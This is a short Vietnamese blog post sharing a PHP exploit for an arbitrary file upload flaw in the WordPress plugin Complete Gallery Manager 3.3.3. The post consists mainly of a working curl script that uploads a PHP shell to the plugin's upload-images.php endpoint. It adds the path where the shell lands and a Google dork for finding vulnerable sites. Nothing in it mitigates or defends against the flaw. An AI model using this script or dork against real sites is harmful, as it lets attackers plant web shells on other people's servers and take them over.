Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload Vulnerability

Exploit :

Code:
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>





Shell Upload Access Path : http://wordpress.localhost:8080/wp-c...2013/09/up.php

Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

0 nhận xét:

Đăng nhận xét

:) :( :)) :(( =))

Copyright © Dương-UG Blog's - Nguyễn Bình Dương